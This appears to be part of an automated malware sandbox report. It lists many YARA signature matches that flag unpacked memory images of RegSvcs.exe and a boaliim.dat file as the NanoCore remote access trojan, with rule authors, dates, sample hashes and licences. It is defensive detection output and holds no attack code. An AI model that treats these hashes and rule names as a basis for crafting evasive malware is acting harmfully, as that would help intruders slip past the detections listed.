Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
